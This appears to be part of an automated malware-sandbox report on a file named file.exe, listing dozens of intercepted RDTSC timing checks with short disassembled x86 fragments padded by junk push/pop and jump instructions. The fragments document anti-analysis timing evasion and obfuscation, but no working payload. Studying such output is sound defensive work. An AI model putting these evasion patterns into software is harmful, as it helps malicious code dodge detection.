Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 704E48 second address: 704E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8EA4C24F96h 0x0000000a jbe 00007F8EA4C24F96h 0x00000010 popad 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F8EA4C24F9Ah 0x0000001e push esi 0x0000001f pop esi 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jp 00007F8EA4C24F96h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 704E74 second address: 704E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 704E78 second address: 704E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 704E7E second address: 704E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1947 second address: 7A194D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A0C3A second address: 7A0C6F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F8EA53EA356h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F8EA53EA360h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 jmp 00007F8EA53EA35Fh 0x0000001d pushad 0x0000001e popad 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A10EA second address: 7A10EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A10EE second address: 7A1100 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8EA53EA356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F8EA53EA356h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1100 second address: 7A113B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F8EA4C24FABh 0x0000000c jmp 00007F8EA4C24FA5h 0x00000011 popad 0x00000012 pushad 0x00000013 jng 00007F8EA4C24F98h 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F8EA4C24F9Bh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A479F second address: 7A47B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jng 00007F8EA53EA356h 0x00000011 js 00007F8EA53EA356h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A406D second address: 7A40D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F8EA4C24F96h 0x0000000b jmp 00007F8EA4C24FA8h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8EA4C24FA9h 0x00000017 popad 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8EA4C24FA6h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8EA4C24F9Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A40D1 second address: 7A40DD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007F8EA53EA356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7033B2 second address: 7033E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jns 00007F8EA4C24F9Ch 0x0000000d push eax 0x0000000e jmp 00007F8EA4C24FA9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A956B second address: 7A9571 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9571 second address: 7A9579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9579 second address: 7A9598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9598 second address: 7A95AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4C24FA0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A98BE second address: 7A98E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F8EA53EA35Ch 0x0000000d pushad 0x0000000e jmp 00007F8EA53EA35Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9BDA second address: 7A9BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9BDE second address: 7A9BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9BE4 second address: 7A9C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F8EA4C24FA2h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9C05 second address: 7A9C1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA361h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757188 second address: 757195 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8EA4C24F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757195 second address: 75719B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75719B second address: 7571A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75724E second address: 757254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757254 second address: 75727E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8EA4C24F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007F8EA4C24FABh 0x00000015 jmp 00007F8EA4C24FA5h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75727E second address: 757284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757284 second address: 757288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757288 second address: 7572A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a movsx ecx, bx 0x0000000d pop edx 0x0000000e push 00000004h 0x00000010 mov ecx, esi 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9ED6 second address: 7A9EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F8EA4C24F9Eh 0x0000000b jns 00007F8EA4C24F96h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9EE9 second address: 7A9EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A9EEF second address: 7A9F03 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8EA4C24F96h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B24C8 second address: 7B24E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8EA53EA362h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B24E2 second address: 7B24E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B2929 second address: 7B2935 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7574FF second address: 757503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B37AA second address: 7B37B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B37B0 second address: 7B37B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3B1B second address: 7B3B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3B25 second address: 7B3B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3B2B second address: 7B3B35 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8EA53EA356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5A61 second address: 7B5A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5A65 second address: 7B5A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5A69 second address: 7B5A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5A6F second address: 7B5A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8EA53EA366h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5A89 second address: 7B5A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD19B second address: 7BD1B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F8EA53EA356h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD1B5 second address: 7BD1D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007F8EA4C24FA6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD312 second address: 7BD318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD5D2 second address: 7BD5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD5D6 second address: 7BD5DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD713 second address: 7BD730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8EA4C24FA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD730 second address: 7BD74A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA53EA366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD88B second address: 7BD89A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD89A second address: 7BD89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BD9F4 second address: 7BDA06 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8EA4C24F96h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BDA06 second address: 7BDA1B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8EA53EA356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edi 0x0000000c push esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BDB57 second address: 7BDB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F8EA4C24F98h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BDB68 second address: 7BDB6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BDB6E second address: 7BDB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C3854 second address: 7C3858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C3D8A second address: 7C3D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C3D94 second address: 7C3D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4039 second address: 7C403E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C403E second address: 7C4044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C42E9 second address: 7C4324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F8EA4C24F98h 0x0000000b jmp 00007F8EA4C24FA6h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F8EA4C24FA3h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4324 second address: 7C432A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C432A second address: 7C4332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4332 second address: 7C433C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C44BA second address: 7C44E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8EA4C24F9Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jbe 00007F8EA4C24F96h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F8EA4C24FA1h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4679 second address: 7C46AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8EA53EA364h 0x00000010 jmp 00007F8EA53EA362h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C46AC second address: 7C46B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C340C second address: 7C3412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CC9C0 second address: 7CC9E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8EA4C24F96h 0x00000009 ja 00007F8EA4C24F96h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8EA4C24F9Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CC483 second address: 7CC489 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CC489 second address: 7CC48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CC5FC second address: 7CC603 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CC603 second address: 7CC60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CC60C second address: 7CC612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CEC89 second address: 7CECA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4C24FA5h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CECA5 second address: 7CECC2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8EA53EA358h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F8EA53EA35Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA495 second address: 7DA4BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F8EA4C24FA9h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DA4BA second address: 7DA4BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9F4B second address: 7D9F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9F55 second address: 7D9F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DD1BD second address: 7DD1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8EA4C24F96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0712 second address: 7E0737 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F8EA53EA366h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0737 second address: 7E0752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4C24FA3h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0231 second address: 7E0235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0378 second address: 7E037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E037D second address: 7E03D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jnp 00007F8EA53EA358h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jc 00007F8EA53EA356h 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F8EA53EA365h 0x00000026 popad 0x00000027 pushad 0x00000028 jmp 00007F8EA53EA360h 0x0000002d jp 00007F8EA53EA356h 0x00000033 jmp 00007F8EA53EA35Ah 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E03D7 second address: 7E03DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
